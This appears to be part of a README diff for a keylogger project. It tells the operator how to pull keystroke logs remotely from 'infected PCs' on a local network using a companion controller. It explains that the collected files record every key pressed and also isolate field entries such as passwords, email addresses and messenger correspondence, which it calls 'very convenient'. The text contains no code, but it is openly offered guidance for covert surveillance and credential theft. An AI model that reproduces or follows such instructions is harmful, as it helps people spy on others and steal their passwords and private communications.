ArGul-0/Local-Keylogger-Agent/README.md

 **3.** You can run the [Controller](https://github.com/ArGul-0/Local-Keylogger-Controller) (located in a separate repository) - *https://github.com/ArGul-0/Local-Keylogger-Controller*, to remotely pull logs from all infected PCs on the local network to your device.
 The result will be saved to the Documents folder for your use.

+**4.** When you go to the documents, you will see a file in .ZIP format and with the name in keylog format, the IP of the Infected machine, and the PORT of the Infected machine.
+After Opening / Unpacking it, you will see 2 .txt files.

+**5.** By opening the file AllClicks.txt you will see all the keys pressed on the infected machine in the format: Date, time, key pressed.
+By opening the file OnlyKeyPressClicks.txt you will see all the characters entered in the fields (not all clicks, but field entries.
+For example, printing in the browser in the search bar, entering a password / mail, correspondence in messengers, etc.), that is, without keyboard shortcuts, random keystrokes, etc. Only field entries (It's very convenient).

 **Main advantages:**